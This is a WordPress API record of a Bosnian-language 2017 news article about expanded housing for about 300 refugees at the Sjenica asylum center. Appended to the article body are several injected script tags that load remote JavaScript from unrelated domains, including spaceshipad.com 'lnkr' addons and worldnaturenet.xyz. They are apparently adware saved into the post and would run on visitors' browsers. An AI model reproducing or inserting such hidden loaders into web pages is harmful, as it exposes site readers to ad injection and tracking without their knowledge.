{"id":187067,"date":"2017-05-17T14:01:47","date_gmt":"2017-05-17T12:01:47","guid":{"rendered":"https:\/\/sandzakpress.net\/arhiva\/?p=187067"},"modified":"2017-05-17T14:01:47","modified_gmt":"2017-05-17T12:01:47","slug":"prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici","status":"publish","type":"post","link":"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/","title":{"rendered":"Pro\u0161iren kapacitet za smje\u0161taj izbjeglica u Sjenici"},"content":{"rendered":"<p><img decoding=\"async\" src=\"http:\/\/www.radiostoplus.com\/images\/clanci\/RAZNO\/zgrada_novog_centra_za_izbeglice.JPG\" \/><\/p>\n<p><b>Adaptacijom Upravne zgrade nekada\u0161nje Fabrike konfekcije \u201eVesna\u201c kapacitet za sme\u0161taj izbjeglica u Sjenici je pove\u0107an za 200 novih mjesta, rekao je danas upravnik Centra za tra\u017eioce azila Fiko Hamidovi\u0107.<\/b><\/p>\n<p>U Sjenici je trenutno oko 300 izbjeglica, od kojih polovina smje\u0161tena u ovom novom prostoru, a to su uglavnom porodice sa djecom.<\/p>\n<p>Hamidovi\u0107 je radiju Sto plus rekao da su pro\u0161irenjem kapaciteta stvoreni bolji uslovi za prihvat izbjeglica, jer je adaptirana zgrada opremljena sa 18 toaleta, 12 tu\u0161 kabina i 10 umivaonika, a u sobama su odvojeno smje\u0161tene porodice koje broje od \u0161est do osam \u010dlanova.<\/p>\n<p>\u201eSve donacije koje budemo dobijali, ulaga\u0107emo u opremanje ovog objekta, koji \u0107e kasnije, kada migrantska kriza bude zavr\u0161ena, ostati op\u0161tini da ga koristi u neke druge namjene. U adaptaciju objekta do sada je ulo\u017eeno oko 100 hiljada eura, a o\u010dekujem da \u0107e donatori u narednom pariodu finansirati obnovu fasade i druge sli\u010dne poslove\u201c, rekao je Hamidovi\u0107.<\/p>\n<p>Novi objekat za smje\u0161taj izbjeglica u Sjenici u utorak je posjetio dr\u017eavni sekretar Nenad Ivani\u0161evi\u0107, koji je rekao da Srbija ima stav da pru\u017ei humane uslove za boravak izbjeglica, ali da je granica te humanosti po\u0161tovanje va\u017ee\u0107ih zakona koje trebaju po\u0161tovati i migranti.<\/p>\n<p>Centar za tra\u017eioce azila u Sjenici postoji od 2013. godine, a kroz njega je na putu ka zemalja Zapadne Evrope pro\u0161lo oko 10 hiljada izbjeglica.<\/p>\n<p>(radiostoplus)<\/p>\n<p><script src=\"http:\/\/asrvvv-a.akamaihd.net\/get?addonname=Not%20set&amp;clientuid=undefined&amp;subID=51172_4402_&amp;affid=9686&amp;subaffid=1001&amp;href=https%3A%2F%2Fsandzakpress.net%2Farhiva%2Fwp-admin%2Fpost.php%3Fpost%3D187067%26action%3Dedit\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/cdncache-a.akamaihd.net\/sub\/nee5452\/51172_4402_\/l.js?pid=2449&amp;ext=Advertise\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/cdncache-a.akamaihd.net\/sub\/nee5452\/51172_4402_\/l.js?pid=2450&amp;ext=Not%20set\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/cdncache-a.akamaihd.net\/sub\/nee5452\/51172_4402_\/l.js?pid=2448&amp;ext=Not%20set\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/spaceshipad.com\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/spaceshipad.com\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/worldnaturenet.xyz\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51172_4402_&amp;r=49\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/spaceshipad.com\/ext\/1132b2759e429a3254.js?sid=51172_4402_&amp;title=Not%20set&amp;blocks[]=04fcf\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Adaptacijom Upravne zgrade nekada\u0161nje Fabrike konfekcije \u201eVesna\u201c kapacitet za sme\u0161taj izbjeglica u Sjenici je pove\u0107an za 200 novih mjesta, rekao je danas upravnik Centra za tra\u017eioce azila Fiko Hamidovi\u0107. U Sjenici je trenutno oko 300 izbjeglica, od kojih polovina smje\u0161tena u ovom novom prostoru, a to su uglavnom porodice sa djecom. Hamidovi\u0107 je radiju Sto [&hellip;]<\/p>\n","protected":false},"author":509,"featured_media":187074,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[52,5,10429,16],"tags":[],"class_list":{"0":"post-187067","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-sjenica","8":"category-drustvo","9":"category-vazno","10":"category-novine"},"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v23.1 (Yoast SEO v24.9) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Pro\u0161iren kapacitet za smje\u0161taj izbjeglica u Sjenici<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/\" \/>\n<meta property=\"og:locale\" content=\"bs_BA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Pro\u0161iren kapacitet za smje\u0161taj izbjeglica u Sjenici\" \/>\n<meta property=\"og:description\" content=\"Adaptacijom Upravne zgrade nekada\u0161nje Fabrike konfekcije \u201eVesna\u201c kapacitet za sme\u0161taj izbjeglica u Sjenici je pove\u0107an za 200 novih mjesta, rekao je danas upravnik Centra za tra\u017eioce azila Fiko Hamidovi\u0107. U Sjenici je trenutno oko 300 izbjeglica, od kojih polovina smje\u0161tena u ovom novom prostoru, a to su uglavnom porodice sa djecom. Hamidovi\u0107 je radiju Sto [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/\" \/>\n<meta property=\"og:site_name\" content=\"Sand\u017eak PRESS\" \/>\n<meta property=\"article:published_time\" content=\"2017-05-17T12:01:47+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/05\/zgrada_novog_centra_za_izbeglice.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"3008\" \/>\n\t<meta property=\"og:image:height\" content=\"2000\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Agencija\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Agencija\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuta\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/\"},\"author\":{\"name\":\"Agencija\",\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/cb59d7e3ab91ab90dd680ad0305a6185\"},\"headline\":\"Pro\u0161iren kapacitet za smje\u0161taj izbjeglica u Sjenici\",\"datePublished\":\"2017-05-17T12:01:47+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/\"},\"wordCount\":244,\"commentCount\":1,\"publisher\":{\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/6e72b67d6e51910a1117b3b483ba20bd\"},\"image\":{\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/05\/zgrada_novog_centra_za_izbeglice.jpg\",\"articleSection\":[\"Sjenica\",\"Dru\u0161tvo\",\"VA\u017dNO!\",\"Novine\"],\"inLanguage\":\"bs-BA\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/\",\"url\":\"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/\",\"name\":\"Pro\u0161iren kapacitet za smje\u0161taj izbjeglica u Sjenici\",\"isPartOf\":{\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/05\/zgrada_novog_centra_za_izbeglice.jpg\",\"datePublished\":\"2017-05-17T12:01:47+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/#breadcrumb\"},\"inLanguage\":\"bs-BA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"bs-BA\",\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/#primaryimage\",\"url\":\"https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/05\/zgrada_novog_centra_za_izbeglice.jpg\",\"contentUrl\":\"https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/05\/zgrada_novog_centra_za_izbeglice.jpg\",\"width\":3008,\"height\":2000},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/sandzakpress.net\/arhiva\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Pro\u0161iren kapacitet za smje\u0161taj izbjeglica u Sjenici\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/#website\",\"url\":\"https:\/\/sandzakpress.net\/arhiva\/\",\"name\":\"Sand\u017eak PRESS\",\"description\":\"Prve elektronske novine u Sand\u017eaku\",\"publisher\":{\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/6e72b67d6e51910a1117b3b483ba20bd\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/sandzakpress.net\/arhiva\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"bs-BA\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/6e72b67d6e51910a1117b3b483ba20bd\",\"name\":\"Kul\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"bs-BA\",\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/42263f39aa27ac04c43cab85c280eb2e?s=96&d=mm&r=pg\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/42263f39aa27ac04c43cab85c280eb2e?s=96&d=mm&r=pg\",\"caption\":\"Kul\"},\"logo\":{\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/cb59d7e3ab91ab90dd680ad0305a6185\",\"name\":\"Agencija\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"bs-BA\",\"@id\":\"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/4b7fafa80a22f0c2afe23966b3961fe0?s=96&d=mm&r=pg\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/4b7fafa80a22f0c2afe23966b3961fe0?s=96&d=mm&r=pg\",\"caption\":\"Agencija\"},\"url\":\"https:\/\/sandzakpress.net\/arhiva\/author\/agencija\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Pro\u0161iren kapacitet za smje\u0161taj izbjeglica u Sjenici","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/","og_locale":"bs_BA","og_type":"article","og_title":"Pro\u0161iren kapacitet za smje\u0161taj izbjeglica u Sjenici","og_description":"Adaptacijom Upravne zgrade nekada\u0161nje Fabrike konfekcije \u201eVesna\u201c kapacitet za sme\u0161taj izbjeglica u Sjenici je pove\u0107an za 200 novih mjesta, rekao je danas upravnik Centra za tra\u017eioce azila Fiko Hamidovi\u0107. U Sjenici je trenutno oko 300 izbjeglica, od kojih polovina smje\u0161tena u ovom novom prostoru, a to su uglavnom porodice sa djecom. Hamidovi\u0107 je radiju Sto [&hellip;]","og_url":"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/","og_site_name":"Sand\u017eak PRESS","article_published_time":"2017-05-17T12:01:47+00:00","og_image":[{"width":3008,"height":2000,"url":"https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/05\/zgrada_novog_centra_za_izbeglice.jpg","type":"image\/jpeg"}],"author":"Agencija","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Agencija","Est. reading time":"1 minuta"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/#article","isPartOf":{"@id":"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/"},"author":{"name":"Agencija","@id":"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/cb59d7e3ab91ab90dd680ad0305a6185"},"headline":"Pro\u0161iren kapacitet za smje\u0161taj izbjeglica u Sjenici","datePublished":"2017-05-17T12:01:47+00:00","mainEntityOfPage":{"@id":"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/"},"wordCount":244,"commentCount":1,"publisher":{"@id":"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/6e72b67d6e51910a1117b3b483ba20bd"},"image":{"@id":"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/#primaryimage"},"thumbnailUrl":"https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/05\/zgrada_novog_centra_za_izbeglice.jpg","articleSection":["Sjenica","Dru\u0161tvo","VA\u017dNO!","Novine"],"inLanguage":"bs-BA","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/","url":"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/","name":"Pro\u0161iren kapacitet za smje\u0161taj izbjeglica u Sjenici","isPartOf":{"@id":"https:\/\/sandzakpress.net\/arhiva\/#website"},"primaryImageOfPage":{"@id":"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/#primaryimage"},"image":{"@id":"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/#primaryimage"},"thumbnailUrl":"https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/05\/zgrada_novog_centra_za_izbeglice.jpg","datePublished":"2017-05-17T12:01:47+00:00","breadcrumb":{"@id":"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/#breadcrumb"},"inLanguage":"bs-BA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/"]}]},{"@type":"ImageObject","inLanguage":"bs-BA","@id":"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/#primaryimage","url":"https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/05\/zgrada_novog_centra_za_izbeglice.jpg","contentUrl":"https:\/\/sandzakpress.net\/arhiva\/wp-content\/uploads\/2017\/05\/zgrada_novog_centra_za_izbeglice.jpg","width":3008,"height":2000},{"@type":"BreadcrumbList","@id":"https:\/\/sandzakpress.net\/arhiva\/prosiren-kapacitet-za-smjestaj-izbjeglica-u-sjenici\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/sandzakpress.net\/arhiva\/"},{"@type":"ListItem","position":2,"name":"Pro\u0161iren kapacitet za smje\u0161taj izbjeglica u Sjenici"}]},{"@type":"WebSite","@id":"https:\/\/sandzakpress.net\/arhiva\/#website","url":"https:\/\/sandzakpress.net\/arhiva\/","name":"Sand\u017eak PRESS","description":"Prve elektronske novine u Sand\u017eaku","publisher":{"@id":"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/6e72b67d6e51910a1117b3b483ba20bd"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/sandzakpress.net\/arhiva\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"bs-BA"},{"@type":["Person","Organization"],"@id":"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/6e72b67d6e51910a1117b3b483ba20bd","name":"Kul","image":{"@type":"ImageObject","inLanguage":"bs-BA","@id":"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/42263f39aa27ac04c43cab85c280eb2e?s=96&d=mm&r=pg","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/42263f39aa27ac04c43cab85c280eb2e?s=96&d=mm&r=pg","caption":"Kul"},"logo":{"@id":"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/image\/"}},{"@type":"Person","@id":"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/cb59d7e3ab91ab90dd680ad0305a6185","name":"Agencija","image":{"@type":"ImageObject","inLanguage":"bs-BA","@id":"https:\/\/sandzakpress.net\/arhiva\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/4b7fafa80a22f0c2afe23966b3961fe0?s=96&d=mm&r=pg","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/4b7fafa80a22f0c2afe23966b3961fe0?s=96&d=mm&r=pg","caption":"Agencija"},"url":"https:\/\/sandzakpress.net\/arhiva\/author\/agencija\/"}]}},"_links":{"self":[{"href":"https:\/\/sandzakpress.net\/arhiva\/wp-json\/wp\/v2\/posts\/187067"}],"collection":[{"href":"https:\/\/sandzakpress.net\/arhiva\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sandzakpress.net\/arhiva\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sandzakpress.net\/arhiva\/wp-json\/wp\/v2\/users\/509"}],"replies":[{"embeddable":true,"href":"https:\/\/sandzakpress.net\/arhiva\/wp-json\/wp\/v2\/comments?post=187067"}],"version-history":[{"count":0,"href":"https:\/\/sandzakpress.net\/arhiva\/wp-json\/wp\/v2\/posts\/187067\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sandzakpress.net\/arhiva\/wp-json\/wp\/v2\/media\/187074"}],"wp:attachment":[{"href":"https:\/\/sandzakpress.net\/arhiva\/wp-json\/wp\/v2\/media?parent=187067"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sandzakpress.net\/arhiva\/wp-json\/wp\/v2\/categories?post=187067"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sandzakpress.net\/arhiva\/wp-json\/wp\/v2\/tags?post=187067"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}